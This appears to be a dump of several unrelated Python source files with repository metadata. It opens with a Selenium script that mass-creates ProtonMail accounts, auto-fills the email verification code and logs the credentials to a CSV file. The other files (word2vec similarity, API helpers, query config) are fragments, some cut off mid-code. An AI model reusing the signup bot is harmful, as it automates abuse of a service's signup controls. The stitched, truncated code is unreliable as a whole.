url = 'http://account.protonvpn.com/signup'
#url =
rngusername = getUserName()
rngpassword = randomStringDigits(15)
driver.get(url)
# time.sleep(10)
# driver.find_element_by_class_name('pm-button w100 mtauto pm-button--primaryborder').click()
# driver.find_element_by_link_text("Get Free").click()
# driver.find_element_by_xpath("/html/body/div[1]/main/main/div/div[4]/div[1]/div[3]/button").click()
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div:nth-child(5) > div:nth-child(1) > div.flex-item-fluid-auto.pt1.pb1.flex.flex-column > button").click()
break
except:
time.sleep(1)
continue
# driver.find_element_by_id('freePlan').click()
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
# time.sleep(4)
# driver.switch_to_frame(0)
# time.sleep(3)
# driver.find_element_by_id('username').send_keys(rngusername)
# time.sleep(1)
# driver.find_element_by_css_selector("#username").send_keys(rngusername)
while True:
try:
driver.find_element_by_id("username").send_keys(rngusername)
driver.find_element_by_id("password").send_keys(rngpassword)
driver.find_element_by_id("passwordConfirmation").send_keys(rngpassword)
driver.find_element_by_id("email").send_keys(verifymail)
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div:nth-child(1) > form > div:nth-child(3) > div > button").click()
break
except:
time.sleep(1)
# driver.switch_to.default_content()
# time.sleep(1)
# driver.find_element_by_id('password').send_keys(rngpassword)
# time.sleep(1)
# driver.find_element_by_id('passwordc').send_keys(rngpassword)
# time.sleep(1)
# driver.switch_to_frame(1)
# time.sleep(1)
# driver.find_element_by_id('notificationEmail').send_keys(notifymail)
while True:
try:
driver.find_element_by_css_selector("body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > div > div > div:nth-child(2) > form > div:nth-child(2) > button").click()
break
except:
time.sleep(1)
# time.sleep(60)
# time.sleep(1)
# email_driver.find_element_by_partial_link_text('verification').click()
# email_driver.find_element_by_link_text('notify@protonmail.ch ').click()
while True:
try:
val = email_driver.find_element_by_class_name('email-excerpt').text
if not val[-6:].isnumeric():
raise Exception
print(val[-6:], "verification")
driver.find_element_by_id('code').send_keys(val[-6:])
time.sleep(1)
driver.find_element_by_css_selector('body > div.app-root > main > main > div > div.pt2.mb2 > div > div.w100 > div:nth-child(2) > form > div > div > div:nth-child(4) > button').click()
break
except:
time.sleep(1)
# driver.find_element_by_name('submitBtn').click()
# time.sleep(6)
# driver.find_element_by_id('id-signup-radio-email').click()
# time.sleep(1)
# driver.find_element_by_id('emailVerification').send_keys(verifymail)
# time.sleep(1)
# driver.find_element_by_class_name('codeVerificator-btn-send').click()
# time.sleep(3)
print ('\033[31m' + "Your New Email Adress is: ", rngusername,"@protonmail.com", sep='' + '\033[0m')
print ('\033[31m' + "Your New Email Password is: " + '\033[0m' , rngpassword)
complete = "false"
while (complete == "false"):
complete_q = input("Did you complete the Verification process? y/n: ")
if complete_q == "y":
driver.close()
csvData = [[verifymail, rngpassword]]
with open('list.csv', 'a') as csvFile:
writer = csv.writer(csvFile)
writer.writerows(csvData)
csvFile.close()
print ('Great! We added you account details to the table.')
complete = "true"
else:
print ('Please try verifing and try again')
time.sleep(1)
complete = "false"
else:
restart_s = input("Do you want to restart the Script and create more Accounts? y/n: ")
if restart_s == "y":
restart ++ 1
clear()
print ('\033[31m' + """\
____ __ __ ___ _ __
/ __ \_________ / /_____ ____ / |/ /___ _(_) /
/ /_/ / ___/ __ \/ __/ __ \/ __ \/ /|_/ / __ `/ / /
/ ____/ / / /_/ / /_/ /_/ / / / / / / / /_/ / / /
/_/ /_/ \____/\__/\____/_/ /_/_/ /_/\__,_/_/_/
___ __
/ | ______________ __ ______ / /_
/ /| |/ ___/ ___/ __ \/ / / / __ \/ __/
/ ___ / /__/ /__/ /_/ / /_/ / / / / /_
/_/ |_\___/\___/\____/\__,_/_/ /_/\__/
______ __
/ ____/_______ ____ _/ /_____ _____
/ / / ___/ _ \/ __ `/ __/ __ \/ ___/
/ /___/ / / __/ /_/ / /_/ /_/ / /
\____/_/ \___/\__,_/\__/\____/_/
""" + '\033[0m')
else:
print ("Ok! The script is exiting now.")
time.sleep(1)
exit()
else:
print("something")
| 37.771331 | 218 | 0.539893 |
3c8d3ed266d844941e1c8f372146b0d80fbb53f5 | 1,491 | py | Python | fixation/configuration.py | deepy/fix-template | 3f9ce0a74712e9e195c392e0104e7dc8a6a575f5 | [
"MIT"
] | null | null | null | fixation/configuration.py | deepy/fix-template | 3f9ce0a74712e9e195c392e0104e7dc8a6a575f5 | [
"MIT"
] | 9 | 2018-05-10T19:04:03.000Z | 2018-06-09T18:10:06.000Z | fixation/configuration.py | deepy/fixation | 3f9ce0a74712e9e195c392e0104e7dc8a6a575f5 | [
"MIT"
] | null | null | null | from fixation.models import get_id, Message, MsgContent, Component, Field, Enum
import os
| 35.5 | 112 | 0.627096 |
3c8d77d4d57e1f26a6211fbc207a54886ca5a41a | 4,201 | py | Python | ApproachV4/src/SentenceSimilarity.py | kanishk2509/TwitterBotDetection | 26355410a43c27fff9d58f71ca0d87ff6e707b6a | [
"Unlicense"
] | 2 | 2021-06-09T20:55:17.000Z | 2021-11-03T03:07:37.000Z | ApproachV4/src/SentenceSimilarity.py | kanishk2509/TwitterBotDetection | 26355410a43c27fff9d58f71ca0d87ff6e707b6a | [
"Unlicense"
] | null | null | null | ApproachV4/src/SentenceSimilarity.py | kanishk2509/TwitterBotDetection | 26355410a43c27fff9d58f71ca0d87ff6e707b6a | [
"Unlicense"
] | 1 | 2020-07-26T02:31:38.000Z | 2020-07-26T02:31:38.000Z |
######################
# Loading word2vec
######################
import os
from threading import Semaphore
import gensim
from gensim.models import KeyedVectors
pathToBinVectors = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300.bin'
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
if os.path.isfile(newFilePath):
print("File exists... please wait")
model = KeyedVectors.load(newFilePath, mmap='r')
model.syn0norm = model.syn0 # prevent recalc of normed vectors
model.most_similar('stuff') # any word will do: just to page all in
Semaphore(0).acquire() # just hang until process killed
else:
print("Loading the data file... Please wait...")
model = gensim.models.KeyedVectors.load_word2vec_format(pathToBinVectors, binary=True)
model.init_sims(replace=True)
newFilePath = '/Users/kanishksinha/Downloads/GoogleNews-vectors-negative300-normed.bin'
model.save(newFilePath)
print("Successfully loaded 3.6 G bin file!")
# How to call one word vector?
# model1['resume'] -> This will return NumPy vector of the word "resume".
import numpy as np
import math
from scipy.spatial import distance
from random import sample
from nltk.corpus import stopwords
if __name__ == "__main__":
print("###################################################################")
print("###################################################################")
print("########### WELCOME TO THE PHRASE SIMILARITY CALCULATOR ###########")
print("###################################################################")
print("###################################################################")
text1 = 'Matt Lieber is a garment that the wind shook.'
text2 = 'Matt Lieber is a final shrug of the shoulders.'
phraseVector1 = PhraseVector(text1)
phraseVector2 = PhraseVector(text2)
similarityScore = phraseVector1.CosineSimilarity(phraseVector2.vector)
print("###################################################################")
print("Similarity Score: ", similarityScore)
print("###################################################################")
| 44.221053 | 191 | 0.615092 |
3c8f07d1d3e0d5bb32a801e512cab31d3aca91cc | 134 | py | Python | LISTAS/Valores-unicos-em-uma-Lista-1/main.py | lucasf5/Python | c5649121e2af42922e2d9c19cec98322e132bdab | [
"MIT"
] | 1 | 2021-09-28T13:11:56.000Z | 2021-09-28T13:11:56.000Z | LISTAS/Valores-unicos-em-uma-Lista-1/main.py | lucasf5/Python | c5649121e2af42922e2d9c19cec98322e132bdab | [
"MIT"
] | null | null | null | LISTAS/Valores-unicos-em-uma-Lista-1/main.py | lucasf5/Python | c5649121e2af42922e2d9c19cec98322e132bdab | [
"MIT"
] | null | null | null | lista = []
x = 0
while x != 999:
x = int(input('Numero: '))
if x not in lista:
lista.append(x)
lista.sort()
print(lista)
| 11.166667 | 28 | 0.559701 |
3c8f9f7ee5923a773fc310335335a5650e8aeefb | 12,399 | py | Python | src/api.py | CodexLink/ProfileMD_DRP | 7604c0d43817daf3590306fd449352673db272fe | [
"Apache-2.0"
] | 8 | 2021-09-22T21:06:13.000Z | 2022-03-27T09:52:55.000Z | src/api.py | CodexLink/ProfileMD_DRP | 7604c0d43817daf3590306fd449352673db272fe | [
"Apache-2.0"
] | 6 | 2021-07-30T09:35:01.000Z | 2022-03-30T13:16:03.000Z | src/api.py | CodexLink/ProfileMD_DRP | 7604c0d43817daf3590306fd449352673db272fe | [
"Apache-2.0"
] | 2 | 2021-08-14T10:45:37.000Z | 2021-11-20T12:41:13.000Z | """
Copyright 2021 Janrey "CodexLink" Licas
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from ast import literal_eval
from asyncio import sleep
from logging import Logger
from os import _exit as terminate
from typing import Any, Callable, Optional, Union
from aiohttp import BasicAuth, ClientResponse, ClientSession
from elements.constants import (
COMMIT_REQUEST_PAYLOAD,
DISCORD_CLIENT_INTENTS,
REQUEST_HEADER,
ExitReturnCodes,
GithubRunnerActions,
GithubRunnerLevelMessages,
)
from elements.typing import (
Base64String,
HttpsURL,
READMEContent,
READMEIntegritySHA,
READMERawContent,
)
| 46.092937 | 234 | 0.583595 |
3c9056dfb6354e5daafd7bffd768de97d7f13f54 | 11,790 | py | Python | src/fidesops/service/connectors/query_config.py | nathanawmk/fidesops | 1ab840206a78e60673aebd5838ba567095512a58 | [
"Apache-2.0"
] | null | null | null | src/fidesops/service/connectors/query_config.py | nathanawmk/fidesops | 1ab840206a78e60673aebd5838ba567095512a58 | [
"Apache-2.0"
] | null | null | null | src/fidesops/service/connectors/query_config.py | nathanawmk/fidesops | 1ab840206a78e60673aebd5838ba567095512a58 | [
"Apache-2.0"
] | null | null | null | import logging
import re
from abc import ABC, abstractmethod
from typing import Dict, Any, List, Set, Optional, Generic, TypeVar, Tuple
from sqlalchemy import text
from sqlalchemy.sql.elements import TextClause
from fidesops.graph.config import ROOT_COLLECTION_ADDRESS, CollectionAddress
from fidesops.graph.traversal import TraversalNode, Row
from fidesops.models.policy import Policy
from fidesops.util.collection_util import append
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
T = TypeVar("T")
def query_sources(self) -> Dict[str, List[CollectionAddress]]:
"""Display the input sources for each query key"""
data: Dict[str, List[CollectionAddress]] = {}
for edge in self.node.incoming_edges():
append(data, edge.f2.field, edge.f1.collection_address())
return data
def display_query_data(self) -> Dict[str, Any]:
"""Data to represent a display (dry-run) query. Since we don't know
what data is available, just generate a query where the input identity
values are assumed to be present and singulur and all other values that
may be multiple are represented by a pair [?,?]"""
data = {}
t = QueryConfig.QueryToken()
for k, v in self.query_sources().items():
if len(v) == 1 and v[0] == ROOT_COLLECTION_ADDRESS:
data[k] = [t]
else:
data[k] = [
t,
QueryConfig.QueryToken(),
] # intentionally want a second instance so that set does not collapse into 1 value
return data
MongoStatement = Tuple[Dict[str, Any], Dict[str, Any]]
"""A mongo query is expressed in the form of 2 dicts, the first of which represents
the query object(s) and the second of which represents fields to return.
e.g. 'collection.find({k1:v1, k2:v2},{f1:1, f2:1 ... })'. This is returned as
a tuple ({k1:v1, k2:v2},{f1:1, f2:1 ... }).
An update statement takes the form
collection.update_one({k1:v1},{k2:v2}...}, {$set: {f1:fv1, f2:fv2 ... }}, upsert=False).
This is returned as a tuple
({k1:v1},{k2:v2}...}, {f1:fv1, f2: fv2 ... }
"""
| 38.655738 | 128 | 0.598473 |
3c90a121b4d915c2524981fd84ae09376497b28d | 91 | py | Python | chocopy-rs/test/pa3/simple_str.py | wwylele/chocopy-wwylele | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | 5 | 2020-05-13T03:47:43.000Z | 2022-01-20T04:52:42.000Z | chocopy-rs/test/pa3/simple_str.py | wwylele/chocopy-wwylele | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | 4 | 2020-05-18T01:06:15.000Z | 2020-06-12T19:33:14.000Z | chocopy-rs/test/pa3/simple_str.py | wwylele/chocopy-rs | ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa | [
"MIT"
] | null | null | null | print("debug_print: 42")
print("")
print("Hello")
#!
#<->#
#debug_print: 42
#
#Hello
#<->#
| 9.1 | 24 | 0.56044 |
3c92d76b2ecb583dc3d4b1217c00aa46b1e963fb | 710 | py | Python | src/catchbot/routes.py | grihabor/catch-hook-telegram-bot | 1f3c6a5d56d5ebba3d4620b532acde2ed734a75e | [
"MIT"
] | null | null | null | src/catchbot/routes.py | grihabor/catch-hook-telegram-bot | 1f3c6a5d56d5ebba3d4620b532acde2ed734a75e | [
"MIT"
] | 4 | 2018-02-21T11:25:49.000Z | 2018-06-23T15:51:51.000Z | src/catchbot/routes.py | grihabor/catch-hook-telegram-bot | 1f3c6a5d56d5ebba3d4620b532acde2ed734a75e | [
"MIT"
] | null | null | null | from flask import request, redirect
from .message import create_message_for_user
from .tasks import send_message_to_bot
| 22.903226 | 63 | 0.683099 |
3c97c75c9954f8ab840e506c7e164088d7c58e96 | 17,208 | py | Python | src/PR_recommend_algorithm.py | HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation-Based-on-Scholarly-Activity-Assessment | 6e94a7775f110bd74a71182f0d29baa91f880ac9 | [
"Apache-2.0"
] | 2 | 2020-05-25T08:20:54.000Z | 2020-05-25T08:21:02.000Z | src/PR_recommend_algorithm.py | HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation | 6e94a7775f110bd74a71182f0d29baa91f880ac9 | [
"Apache-2.0"
] | null | null | null | src/PR_recommend_algorithm.py | HyunJW/An-Algorithm-for-Peer-Reviewer-Recommendation | 6e94a7775f110bd74a71182f0d29baa91f880ac9 | [
"Apache-2.0"
] | null | null | null | #-*- coding:utf-8 -*-
#import python packages
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.metrics import adjusted_rand_score
from sklearn.metrics import silhouette_samples
from sklearn.cluster import KMeans
from sklearn.utils.testing import ignore_warnings
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import *
from sklearn.cluster import *
from gensim.summarization.summarizer import summarize
from gensim.summarization import keywords
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from operator import itemgetter
from operator import attrgetter
from pyjarowinkler import distance
from collections import Counter
from matplotlib import pyplot as plt
import pandas as pd
import numpy as np
import nltk
import math
import time
import csv
import sys
import re
import io
import os
start_time = time.time()
#
#
#
# (csv path, csv path, )
#
# (csv path, DataFrame, i , , )
#
# (_csv path, _csv path, _csv path,_DataFrame, _DataFrame, i , , __)
#csv
# (save_path, _DataFrame, _DataFrame, i , )
#
# ( path)
#
if __name__ == '__main__':
#
main() | 29.01855 | 179 | 0.609949 |
3c988a3bbfa24fe5c3273607b2e3a5909c559524 | 2,241 | py | Python | controlimcap/models/flatattn.py | SikandarBakht/asg2cap | d8a6360eaccdb8c3add5f9c4f6fd72764e47e762 | [
"MIT"
] | 169 | 2020-03-15T08:41:39.000Z | 2022-03-30T09:36:17.000Z | controlimcap/models/flatattn.py | wtr850/asg2cap | 97a1d866d4a2b86c1f474bb168518f97eb2f8b96 | [
"MIT"
] | 25 | 2020-05-23T15:14:00.000Z | 2022-03-10T06:20:31.000Z | controlimcap/models/flatattn.py | wtr850/asg2cap | 97a1d866d4a2b86c1f474bb168518f97eb2f8b96 | [
"MIT"
] | 25 | 2020-04-02T10:08:01.000Z | 2021-12-09T12:10:10.000Z | import torch
import torch.nn as nn
import framework.configbase
import caption.encoders.vanilla
import caption.decoders.attention
import caption.models.attention
import controlimcap.encoders.flat
from caption.models.attention import MPENCODER, ATTNENCODER, DECODER
| 43.096154 | 95 | 0.764391 |
3c99a84bfa19cff4eef1b2a7eb8aeb82d35b63a6 | 5,169 | py | Python | pywincffi/kernel32/console.py | opalmer/pycffiwin32 | 39210182a92e93c37a9f1c644fd5fcc1aa32f6d1 | [
"MIT"
] | 10 | 2015-11-19T12:39:50.000Z | 2021-02-21T20:15:29.000Z | pywincffi/kernel32/console.py | opalmer/pycffiwin32 | 39210182a92e93c37a9f1c644fd5fcc1aa32f6d1 | [
"MIT"
] | 109 | 2015-06-15T05:03:33.000Z | 2018-01-14T10:18:48.000Z | pywincffi/kernel32/console.py | opalmer/pycffiwin32 | 39210182a92e93c37a9f1c644fd5fcc1aa32f6d1 | [
"MIT"
] | 8 | 2015-07-29T04:18:27.000Z | 2018-11-02T17:15:40.000Z | """
Console
-------
A module containing functions for interacting with a Windows
console.
"""
from six import integer_types
from pywincffi.core import dist
from pywincffi.core.checks import NON_ZERO, NoneType, input_check, error_check
from pywincffi.exceptions import WindowsAPIError
from pywincffi.wintypes import HANDLE, SECURITY_ATTRIBUTES, wintype_to_cdata
def SetConsoleTextAttribute(hConsoleOutput, wAttributes):
"""
Sets the attributes of characters written to a console buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/setconsoletextattribute
:param pywincffi.wintypes.HANDLE hConsoleOutput:
A handle to the console screen buffer. The handle must have the
``GENERIC_READ`` access right.
:param int wAttributes:
The character attribute(s) to set.
"""
input_check("hConsoleOutput", hConsoleOutput, HANDLE)
input_check("wAttributes", wAttributes, integer_types)
ffi, library = dist.load()
# raise Exception(type(wAttributes))
# info = ffi.new("PCHAR_INFO")
code = library.SetConsoleTextAttribute(
wintype_to_cdata(hConsoleOutput),
ffi.cast("ATOM", wAttributes)
)
error_check("SetConsoleTextAttribute", code=code, expected=NON_ZERO)
def GetConsoleScreenBufferInfo(hConsoleOutput):
"""
Retrieves information about the specified console screen buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/getconsolescreenbufferinfo
:param pywincffi.wintypes.HANDLE hConsoleOutput:
A handle to the console screen buffer. The handle must have the
``GENERIC_READ`` access right.
:returns:
Returns a ffi data structure with attributes corresponding to
the fields on the ``PCONSOLE_SCREEN_BUFFER_INFO`` struct.
"""
input_check("hConsoleOutput", hConsoleOutput, HANDLE)
ffi, library = dist.load()
info = ffi.new("PCONSOLE_SCREEN_BUFFER_INFO")
code = library.GetConsoleScreenBufferInfo(
wintype_to_cdata(hConsoleOutput), info)
error_check("GetConsoleScreenBufferInfo", code, expected=NON_ZERO)
return info
def CreateConsoleScreenBuffer(
dwDesiredAccess, dwShareMode, lpSecurityAttributes=None, dwFlags=None):
"""
Creates a console screen buffer.
.. seealso::
https://docs.microsoft.com/en-us/windows/console/createconsolescreenbuffer
:type dwDesiredAccess: int or None
:param dwDesiredAccess:
The access to the console screen buffer. If `None` is provided
then the Windows APIs will use a default security descriptor.
:type dwShareMode: int or None
:param dwShareMode:
Controls the options for sharing the resulting handle. If `None` or
0 then the resulting buffer cannot be shared.
:keyword pywincffi.wintypes.SECURITY_ATTRIBUTES lpSecurityAttributes:
Extra security attributes that determine if the resulting handle
can be inherited. If `None` is provided, which is the default, then
the handle cannot be inherited.
:keyword int dwFlags:
The type of console buffer to create. The flag is superficial because
it only accepts None or ``CONSOLE_TEXTMODE_BUFFER`` as inputs. If no
value is provided, which is the default, then
``CONSOLE_TEXTMODE_BUFFER`` is automatically used.
:rtype: :class:`pywincffi.wintypes.HANDLE``
:returns:
Returns the handle created by the underlying C function.
:func:`pywincffi.kernel32.CloseHandle` should be called on the handle
when you are done with it.
"""
ffi, library = dist.load()
if dwDesiredAccess is None:
dwDesiredAccess = ffi.NULL
if dwShareMode is None:
dwShareMode = 0
if dwFlags is None:
dwFlags = library.CONSOLE_TEXTMODE_BUFFER
input_check(
"dwDesiredAccess", dwDesiredAccess, allowed_values=(
ffi.NULL,
library.GENERIC_READ,
library.GENERIC_WRITE,
library.GENERIC_READ | library.GENERIC_WRITE
))
input_check(
"dwShareMode", dwShareMode, allowed_values=(
0,
library.FILE_SHARE_READ,
library.FILE_SHARE_WRITE,
library.FILE_SHARE_READ | library.FILE_SHARE_WRITE,
))
input_check(
"dwFlags", dwFlags,
allowed_values=(
library.CONSOLE_TEXTMODE_BUFFER,
))
input_check(
"lpSecurityAttributes", lpSecurityAttributes,
allowed_types=(NoneType, SECURITY_ATTRIBUTES))
if lpSecurityAttributes is None:
lpSecurityAttributes = ffi.NULL
handle = library.CreateConsoleScreenBuffer(
ffi.cast("DWORD", dwDesiredAccess),
ffi.cast("DWORD", dwShareMode),
lpSecurityAttributes,
ffi.cast("DWORD", dwFlags),
ffi.NULL # _reserved_
)
if handle == library.INVALID_HANDLE_VALUE: # pragma: no cover
raise WindowsAPIError(
"CreateConsoleScreenBuffer", "Invalid Handle",
library.INVALID_HANDLE_VALUE,
expected_return_code="not INVALID_HANDLE_VALUE")
return HANDLE(handle)
| 32.923567 | 83 | 0.691623 |
3c9a8ed33f779646dc17846360f63018c12812e8 | 2,568 | py | Python | src/extractClimateObservations.py | bcgov/nr-rfc-ensweather | 5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6 | [
"Apache-2.0"
] | 1 | 2021-03-23T15:32:39.000Z | 2021-03-23T15:32:39.000Z | src/extractClimateObservations.py | bcgov/nr-rfc-ensweather | 5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6 | [
"Apache-2.0"
] | 7 | 2021-02-05T00:52:08.000Z | 2022-03-01T21:37:43.000Z | src/extractClimateObservations.py | bcgov/nr-rfc-ensweather | 5d1ce776e6eeb35a5672ca194e3c2ced1be98ed6 | [
"Apache-2.0"
] | 2 | 2021-02-24T20:29:39.000Z | 2021-03-23T15:32:44.000Z | """
extracts the climate observation data from the xlsx spreadsheet to a csv file
so that ens weather scripts can consume it.
Looks in the folder os.environ["ENS_CLIMATE_OBS"]
determines the relationship between the xlsx source and the csv destinations
deleteds any csv's and regenerates them by exporting the ALL_DATa sheet
from the corresponding xlsx file
"""
import csv
import glob
import logging.config
import openpyxl
import os
import pandas as pd
import config.logging_config
logging.config.dictConfig(config.logging_config.LOGGING_CONFIG)
LOGGER = logging.getLogger(__name__)
excelFileDir = os.environ["ENS_CLIMATE_OBS"]
excelFileGlobPattern = "ClimateDataOBS_*.xlsx"
csvFileNamePattern = "climate_obs_{year}.csv"
sheetName = 'ALL_DATA'
def convertCsvPandas(excelFile, csvFileFullPath):
"""
Doesn't work for some reason
"""
data_xls = pd.read_excel(excelFile, sheet_name="ALL_DATA")
data_xls.to_csv(csvFileFullPath, encoding="utf-8", index=False, header=True)
if __name__ == "__main__":
globDir = os.path.join(excelFileDir, excelFileGlobPattern)
LOGGER.debug(f"glob pattern: {excelFileGlobPattern}")
excelClimateObservationFiles = glob.glob(globDir)
for excelFile in excelClimateObservationFiles:
LOGGER.info(f"input excelFile: {excelFile}")
# extract the year from the filename
excelFileBasename = os.path.basename(excelFile)
year = os.path.splitext(excelFileBasename)[0].split("_")[1]
LOGGER.debug(f"year from excel file parse: {year}")
csvFileName = csvFileNamePattern.format(year=year)
LOGGER.info(f"output csv file: {csvFileName}")
csvFileFullPath = os.path.join(excelFileDir, csvFileName)
if os.path.exists(csvFileFullPath):
LOGGER.info(f"deleting the csv file: {csvFileFullPath}")
os.remove(csvFileFullPath)
LOGGER.info(f"dumping the sheet: {sheetName} from the file {excelFile} to {csvFileFullPath}")
convertCsvXlrd(excelFile, sheetName, csvFileFullPath)
| 35.178082 | 101 | 0.712227 |
3c9b6cb2f965c39ce2408034c9338f67c659fa02 | 403 | py | Python | Python/Basic Data Types/finding-the-percentage.py | mateusnr/hackerrank-solutions | 2fa60bae480d8afb46e3d99929707a7d9d92858f | [
"CC0-1.0"
] | 1 | 2015-08-01T04:03:47.000Z | 2015-08-01T04:03:47.000Z | Python/Basic Data Types/finding-the-percentage.py | mateusnr/hackerrank-solutions | 2fa60bae480d8afb46e3d99929707a7d9d92858f | [
"CC0-1.0"
] | null | null | null | Python/Basic Data Types/finding-the-percentage.py | mateusnr/hackerrank-solutions | 2fa60bae480d8afb46e3d99929707a7d9d92858f | [
"CC0-1.0"
] | 4 | 2020-05-04T15:12:21.000Z | 2021-02-18T11:58:30.000Z | n = int(input()) # takes the number of arguments
mdict = {}
for i in range(0,n):
grades = input().split(" ") # self explanatory
scores = list(map(float, grades[1:])) # since the first element from the list grades is the name of the student
mdict[grades[0]] = sum(scores)/float(len(scores)) # the key is the name of the student and the value is the average
print("%.2f" % mdict[input()]) | 50.375 | 120 | 0.665012 |
3c9c7350a4efa3be4f373180a4fc5ceaa1d748e4 | 2,764 | py | Python | src/6_ZigZagConversion.py | chenbin11200/AlgorithmInPython | 222780f14afdafc4c7d0047b6f1477bd0b0ecf0f | [
"MIT"
] | null | null | null | src/6_ZigZagConversion.py | chenbin11200/AlgorithmInPython | 222780f14afdafc4c7d0047b6f1477bd0b0ecf0f | [
"MIT"
] | null | null | null | src/6_ZigZagConversion.py | chenbin11200/AlgorithmInPython | 222780f14afdafc4c7d0047b6f1477bd0b0ecf0f | [
"MIT"
] | null | null | null |
# This is NOT zigzag conversion, instead it is
# 1 5 9
# 2 4 6 8 .
# 3 7 .
print BestSolution().convert('abc', 2) | 27.098039 | 79 | 0.45152 |
3c9d412ce7e720587944a183ef63dc8c3a37cb1a | 2,437 | py | Python | server/server/parsing/session.py | PixelogicDev/zoom_attendance_check | 7c47066d006ae2205ccb04371115904ec48e3bda | [
"MIT"
] | 1 | 2020-12-30T19:39:56.000Z | 2020-12-30T19:39:56.000Z | server/server/parsing/session.py | PixelogicDev/zoom_attendance_check | 7c47066d006ae2205ccb04371115904ec48e3bda | [
"MIT"
] | null | null | null | server/server/parsing/session.py | PixelogicDev/zoom_attendance_check | 7c47066d006ae2205ccb04371115904ec48e3bda | [
"MIT"
] | null | null | null | import pandas as pd | 55.386364 | 137 | 0.684858 |
3c9f1d64c05ce80fd3ad121b31d428afa01b9e36 | 4,538 | py | Python | project/image.py | Mandrenkov/SVBRDF-Texture-Synthesis | 7e7282698befd53383cbd6566039340babb0a289 | [
"MIT"
] | 2 | 2021-04-26T14:41:11.000Z | 2021-08-20T09:13:03.000Z | project/image.py | Mandrenkov/SVBRDF-Texture-Synthesis | 7e7282698befd53383cbd6566039340babb0a289 | [
"MIT"
] | null | null | null | project/image.py | Mandrenkov/SVBRDF-Texture-Synthesis | 7e7282698befd53383cbd6566039340babb0a289 | [
"MIT"
] | null | null | null | import imageio # type: ignore
import logging
import numpy # type: ignore
import os
import pathlib
import torch
import torchvision # type: ignore
import utils
from torch import Tensor
from typing import Callable
def load(path: str, encoding: str = 'RGB') -> Tensor:
'''
Loads the image at the given path using the supplied encoding.
Args:
path: Path to the image.
encoding: Encoding of the image.
Returns:
Tensor [R, C, X] representing the normalized pixel values in the image.
'''
assert path, "Path cannot be empty or set to None."
array = imageio.imread(path)
device = utils.get_device_name()
image = torchvision.transforms.ToTensor()(array).to(device).permute(1, 2, 0)[:, :, :3]
if encoding == 'sRGB':
image = convert_sRGB_to_RGB(image)
elif encoding == 'Greyscale':
image = convert_RGB_to_greyscale(image)
elif encoding != 'RGB':
raise Exception(f'Image encoding "{encoding}" is not supported."')
logging.debug('Loaded image from "%s"', path)
return image
def save(path: str, image: Tensor, encoding: str = 'RGB') -> None:
'''
Saves the given image to the specified path using the supplied encoding.
Args:
path: Path to the image.
image: Tensor [R, C, X] of normalized pixel values in the image.
encoding: Encoding of the image.
'''
assert path, "Path cannot be empty or set to None."
assert torch.all(0 <= image) and torch.all(image <= 1), "Image values must fall in the closed range [0, 1]."
if encoding == 'sRGB':
image = convert_RGB_to_sRGB(image)
elif encoding == 'Greyscale':
image = convert_greyscale_to_RGB(image)
elif encoding != 'RGB':
raise Exception(f'Image encoding "{encoding}" is not supported."')
pathlib.Path(os.path.dirname(path)).mkdir(parents=True, exist_ok=True)
imageio.imwrite(path, torch.floor(255 * image).detach().cpu().numpy().astype(numpy.uint8))
logging.debug('Saved image to "%s"', path)
def clamp(function: Callable[[Tensor], Tensor]) -> Callable:
'''
Decorator which clamps an image destined for the given function to the range [, 1]. Note that is used in favour
of 0 to enable differentiation through fractional exponents.
Args:
function: Function that accepts an image Tensor as input.
Returns:
Wrapper which implements the aforementioned behaviour.
'''
return lambda image: function(image.clamp(1E-8, 1))
def convert_RGB_to_greyscale(image: Tensor) -> Tensor:
'''
Converts a linear RGB image into a greyscale image.
Args:
image: Tensor [R, C, 3] of an RGB image.
Returns:
Tensor [R, C, 1] of a greyscale image.
'''
assert len(image.shape) == 3 and (image.size(2) == 1 or image.size(2) == 3), 'RGB image must have dimensionality [R, C, 1] or [R, C, 3].'
if image.size(2) == 3:
assert torch.all((image[:, :, 0] == image[:, :, 1]) & (image[:, :, 0] == image[:, :, 2])), 'RGB image must have the same value across each colour channel.'
return image[:, :, [0]]
return image
def convert_greyscale_to_RGB(image: Tensor) -> Tensor:
'''
Converts a greyscale image into a linear RGB image.
Args:
image: Tensor [R, C, 1] of a greyscale image.
Returns:
Tensor [R, C, 3] of a linear RGB image.
'''
assert len(image.shape) == 3 and image.size(2) == 1, 'Greyscale image must have dimensionality [R, C, 1].'
return image.expand(-1, -1, 3)
| 32.884058 | 163 | 0.628691 |
b1af4bb14846eb251b39a1c7a18e1ee46ffce810 | 12,611 | py | Python | node_graph.py | JasonZhuGit/py_path_planner | e045a076c2c69284f1f977420ad93a966161e012 | [
"Apache-2.0"
] | null | null | null | node_graph.py | JasonZhuGit/py_path_planner | e045a076c2c69284f1f977420ad93a966161e012 | [
"Apache-2.0"
] | null | null | null | node_graph.py | JasonZhuGit/py_path_planner | e045a076c2c69284f1f977420ad93a966161e012 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding:utf-8 -*-
